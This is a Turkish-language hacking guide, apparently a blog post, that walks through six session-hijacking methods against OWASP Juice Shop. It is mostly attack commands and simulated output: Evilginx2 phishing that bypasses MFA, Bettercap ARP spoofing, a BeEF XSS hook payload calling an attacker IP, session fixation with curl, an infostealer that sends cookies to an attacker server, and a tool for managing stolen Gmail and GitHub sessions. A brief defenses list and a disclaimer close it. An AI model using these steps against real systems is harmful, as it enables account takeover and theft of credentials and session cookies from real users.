-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
🔐 SESSİON HİJACKİNG 2026: ÇEREZLERİ ÇAL, OTOURUMLARI ELE GEÇİR (6 YÖNTEM)
🧠 BAŞLAMADAN ÖNCE: SESSİON HİJACKİNG NEDİR?
Session hijacking, bir kullanıcının aktif web oturumunu ele geçirerek şifresini bilmeden hesabına erişme tekniğidir. Günümüzde saldırganlar artık şifreleri değil, session cookie’leri hedef alıyor. Çünkü bir session cookie’yi çalmak, MFA’yı (çok faktörlü kimlik doğrulama) bile atlamanıza olanak tanır.
Bu rehberde 6 farklı yöntem ile session hijacking yapmayı göstereceğim.
Hedef Web Uygulaması: juice-shop.herokuapp.com (OWASP Juice Shop)
🎯 HEDEF
| Özellik | Değer |
|---|---|
| Hedef Uygulama | OWASP Juice Shop (Eğitim amaçlı açık kaynak) |
| Saldırgan IP | 192.168.1.100 |
| Hedef Kullanıcı | [email protected] |
| Ağ Ortamı | Aynı ağ (192.168.1.0/24) veya uzaktan erişim |
🔻 1. YOL – EVİLGİNX2 İLE AİTM FİSHİNG (MFA BYPASS)
Adım 1: Evilginx2 Kurulumu
bashsudo apt update
sudo apt install golang-go git
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo make install
Adım 2: Phishing Sayfası Oluşturma
bashsudo evilginx2 -p
evilginx2> config domain juice-shop-phish.com
evilginx2> config ip 192.168.1.100
evilginx2> lure create juice-shop
evilginx2> lure edit juice-shop url https://juice-shop.herokuapp.com
evilginx2> lure get-url juice-shop
Simüle edilmiş çıktı:
text
[+] Phishing URL: https://juice-shop-phish.com/login
[+] Lure created successfully. Waiting for victims...
Adım 3: Session Cookie Yakalama
Hedef, phishing linkine tıkladığında:text
[!] New session captured!
IP: 192.168.1.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Email: [email protected]
Password: [GİZLİ]
MFA Code: 284739 (2FA bypassed!)
[+] Session cookie intercepted!
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Adım 4: Çalınan Cookie ile Oturumu Devralma
bash# Firefox'ta Cookie-Editor eklentisi ile cookie'yi ekle
# veya Python ile:
python
import requests
cookies = {'token': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'}
response = requests.get('https://juice-shop.herokuapp.com/profile', cookies=cookies)
print(response.text)
✅ Bu yöntemle kazandıklarımız:
- Kullanıcının şifresi ve MFA kodu
- Session cookie (token)
- Tam hesap erişimi
🔻 2. YOL – BETTERCAP İLE AĞ TABANLI COOKIE ÇALMA
Adım 1: Bettercap Kurulumu
bashsudo apt install bettercap
Adım 2: ARP Spoofing ile MITM Saldırısı Başlatma
bashsudo bettercap -eval "set arp.spoof.targets 192.168.1.105; arp.spoof on; net.sniff on"
Simüle edilmiş çıktı:
text
[192.168.1.105] 192.168.1.1 : sniffed 234 http requests
[192.168.1.105] GET /rest/products/search?q=
[192.168.1.105] POST /rest/user/login
[+] Captured HTTP request with session cookie:
Host: juice-shop.herokuapp.com
Cookie: sessionId=abc123def456...
Adım 3: Yakalanan Cookie ile Oturumu Ele Geçirme
bash# Yakalanan cookie'yi kullanarak yetkili sayfaya erişim
curl -H "Cookie: sessionId=abc123def456" https://juice-shop.herokuapp.com/profile
✅ Bu yöntemle kazandıklarımız:
- Ağ trafiğindeki tüm HTTP cookie’ler
- Hedefin aktif oturumları
🔻 3. YOL – BeEF İLE XSS TABANLI SESSİON HİJACKİNG
Adım 1: BeEF Kurulumu
bashsudo apt install beef-xss
sudo beef-xss
Simüle edilmiş çıktı:
text
[+] BeEF is running. Open http://127.0.0.1:3000/ui/panel
[+] Hook URL: http://192.168.1.100:3000/hook.js
Adım 2: XSS Payload ile Hook’u Enjekte Etme
Hedef web uygulamasında XSS zafiyeti bulunan bir alana şu payload eklenir:html
<script src="http://192.168.1.100:3000/hook.js"></script>
BeEF Panel’de görülen çıktı:
text
[+] New hooked browser: 192.168.1.105 (Chrome 120)
[+] Browser details: Windows 10, 1920x1080
Adım 3: BeEF ile Cookie Çalma
BeEF panelinde Commands → Browser → Get Cookie seçilir:text
[+] Cookies retrieved:
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
sessionId: abc123def456...
✅ Bu yöntemle kazandıklarımız:
- Hedef tarayıcının tüm cookie’leri
- Tarayıcı ve sistem bilgileri
- Uzaktan komut çalıştırma imkanı
🔻 4. YOL – SESSİON FİXATİON (OTURUM SABİTLEME)
Adım 1: Zafiyetli Uygulama Tespiti
Session fixation zafiyeti genellikle şu durumlarda bulunur:- Uygulama giriş sonrası session ID’yi yenilemiyor
- URL üzerinden session ID kabul ediyor (PHPSESSID=abc123)
- Çerezin HttpOnly flag’i yok
Adım 2: Sabit Session ID ile Phishing Linki Oluşturma
bash# Önce kendi session ID’mizi oluşturalım
curl -c cookies.txt https://juice-shop.herokuapp.org
cat cookies.txt
Simüle edilmiş çıktı:
text
token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... TRUE /
Adım 3: Kurbanı Sabit ID ile Yönlendirme
Kurbana şu link gönderilir:text
Kurban bu link ile giriş yaptığında, saldırgan aynı token’ı kullanarak oturumu devralır.
Adım 4: Oturumu Ele Geçirme
bashcurl -H "Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." https://juice-shop.herokuapp.com/profile
✅ Bu yöntemle kazandıklarımız:
- Session ID yenilenmeyen uygulamalarda tam yetkili erişim
- Kurbanın şifresini bilmeye gerek yok
🔻 5. YOL – MODERN INFOSTEALER İLE COOKIE ÇALMA
Storm Infostealer Çalışma Prensibi
text┌─────────────────────────────────────────────────────────────────┐
│ STORM INFOSTEALER │
├─────────────────────────────────────────────────────────────────┤
│ [1] Kurban sahte bir uygulama indirir ve çalıştırır │
│ [2] Malware, tarayıcıdaki tüm cookie’leri şifreler │
│ [3] Veriler attacker sunucusuna gönderilir │
│ [4] Saldırgan sunucuda verileri çözer │
│ [5] Session cookie’ler ile hesaba giriş yapılır │
└─────────────────────────────────────────────────────────────────┘
Simüle edilmiş Çıktı (Attacker Sunucusu)
text[+] New victim connected: 192.168.1.105 (Windows 11)
[+] Browser: Chrome 124
[+] Extracted data:
- Google: token=ya29.a0AfH6SMB...
- Facebook: c_user=1000123456...
- Instagram: sessionid=123456...
- 15 other session cookies captured
[+] All cookies exported to: stolen_sessions.json
Çalınan Cookie ile Giriş
json{
"target": "juice-shop.herokuapp.com",
"cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
"timestamp": "2026-04-15T10:30:00Z"
}
✅ Bu yöntemle kazandıklarımız:
- Tüm tarayıcılardaki session cookie’ler
- Kayıtlı şifreler ve kredi kartı bilgileri
- Google/Microsoft hesaplarına erişim
🔻 6. YOL – SESSİON SUSHI İLE TARAYICI SESSİON YÖNETİMİ
Adım 1: Session Sushi Kurulumu
bashgit clone https://github.com/phishingclub/session-sushi.git
cd session-sushi
npm install
Adım 2: Çalınan Cookie’leri İçe Aktarma
bashnode sushi.js import --file stolen_cookies.json
Simüle edilmiş çıktı:
text
[+] Loading stolen sessions from: stolen_cookies.json
[+] Session imported: juice-shop ([email protected])
[+] Session imported: gmail ([email protected])
[+] 12 sessions imported successfully.
Adım 3: Session’ları Yönetme
bashnode sushi.js list
Simüle edilmiş çıktı:
text
┌─────────────────────────────────────────────────────────────────┐
│ ID │ Target │ User │ Expires │
├─────┼─────────────────────┼─────────────────┼───────────────────┤
│ 1 │ juice-shop │ admin │ 2026-04-22 15:30 │
│ 2 │ gmail.com │ target@gmail │ 2026-04-16 08:00 │
│ 3 │ github.com │ target_dev │ 2026-04-20 12:00 │
└─────────────────────────────────────────────────────────────────┘
Adım 4: Session’u Tarayıcıya Aktarma
bashnode sushi.js load --id 1 --browser chrome
✅ Bu yöntemle kazandıklarımız:
- Çalınan cookie’leri organize etme
- Farklı tarayıcılara kolay aktarım
- Session’ların süresini takip etme
🧩 ÖZET – 6 FARKLI SESSİON HİJACKİNG YÖNTEMİ
| Yol | Yöntem | Kullanılan Araç(lar) | Zorluk | MFA Bypass |
|---|---|---|---|---|
| 1 | AiTM Phishing | Evilginx2 | Orta | ✅ Evet |
| 2 | MITM + Sniffing | Bettercap | Kolay | ❌ Hayır (sadece HTTP) |
| 3 | XSS + Browser Hook | BeEF | Orta | ❌ Hayır |
| 4 | Session Fixation | Web tarayıcısı / curl | Kolay | ❌ Hayır |
| 5 | Malware Stealer | Storm Infostealer | Zor | ✅ Evet |
| 6 | Session Management | Session Sushi | Kolay | - (yönetim aracı) |
📢;
Bu rehberde anlattığım her komut, her çıktı saf bilgidir. Session hijacking, günümüzde şifre çalmaktan daha etkili bir yöntem haline gelmiştir. Çünkü bir session cookie’yi çalmak, MFA’yı atlamanıza ve hesaba direkt erişmenize olanak tanır.Unutmayın: Artık saldırganlar şifrelerin peşinde değil. Hedefte olan şey, sizin aktif oturum cookie’leriniz.
🛡️ KORUNMA YÖNTEMLERİ
- HttpOnly flag: Cookie’lere JavaScript ile erişimi engeller
- Secure flag: Cookie’lerin sadece HTTPS üzerinden gönderilmesini sağlar
- SameSite=Strict: CSRF ve bazı session hijacking vektörlerini engeller
- Kısa session süreleri: Cookie’lerin çabuk geçersiz olmasını sağlar
- Giriş sonrası session yenileme: Session fixation’ı engeller
🔚:
Artık 6 farklı session hijacking yöntemini biliyorsunuz. Evilginx2 ile 2FA’yı aşan phishing, Bettercap ile ağ tabanlı cookie çalma, BeEF ile XSS tabanlı session ele geçirme, session fixation, modern infostealer’lar ve Session Sushi ile yönetim. Gerisi pratik. Kendi laboratuvarınızda bu adımları deneyin.Ve unutmayın: Savunması olmayanın saldırısı, sadece intihardır.
Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
